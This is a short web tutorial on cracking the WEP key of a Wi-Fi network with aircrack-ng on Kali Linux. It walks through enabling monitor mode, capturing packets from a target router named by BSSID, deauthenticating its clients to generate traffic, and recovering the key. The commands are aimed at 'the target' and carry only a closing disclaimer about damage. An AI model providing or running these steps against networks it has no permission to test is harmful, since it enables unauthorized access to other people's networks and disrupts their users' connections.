Steps For Hacking WiFi & Cracking WEP Key on Kali Linux:
Let’s begin… Open the Terminal and Type the following command to find whether your wireless card is working or not.
airmon-ng
To check whether the wireless card is there or is functioning properly.
Now type the following command to put your wireless card in monitoring mode.
airmon-ng start wlan0
To start the wlan or wireless card.
airodump-ng mon0
Note that mon0 might be mon1, mon2, mon3 etc. depending upon the number of monitoring mode already running on your system. Find the monitoring mode (ie. mon1, mon2 etc.)
Now here our target is (example) “nikhil”(the name of the router) which is using WEP encryption and authentication. Wifi mtnl is working on channel 4 and bssid is 0C:D2:B5:03:43:68(NOTE- type bssid of the target and the channel on which it is functioning.). Now type the following command to start capturing its packet which might have encrypted password.
airodump-ng –w nikhil-org –c 4 –bssid 0C:D2:B5:03:43:68 mon0
Let me explain the command, -w is for writing into a file that we are going to create i.e. mtnl-org, -c is used for channel which is currently 4.
Now after typing the command wait for 10-15 minutes to capture around 15,000 ivs packets. The time duration depends on the traffic on network, your distance from the access point and actually the no. of ivs you have captured
Hey, if there is only few packets coming then you can try to deauth to generate more data packets with following command:
aireplay-ng -0 0 -a 0C:D2:B5:03:43:68 mon0
Finally, Type the following command to start cracking WEP key of the network.
aircrack-ng nikhil-org-01.cap
Notice the file name carefully as the program automatically ads -01, -02, -03 etc. to the file name you have suggested. It depends upon the no. of file you have with same name.
After a few seconds or minutes you will find that the password is 100% decrypted.
Troubleshooting: If you were unable to crack WEP key of your WiFi then you might have typed wrong command or had input wrong value like channel number, bssid or something. Be Careful!
You might not have captured enough packets and ivs that are necessary to crack the WEP key. Don’t worry you’ll error message about this.
The author is not responsible for any damage caused to anyone or anything in any form henceforth.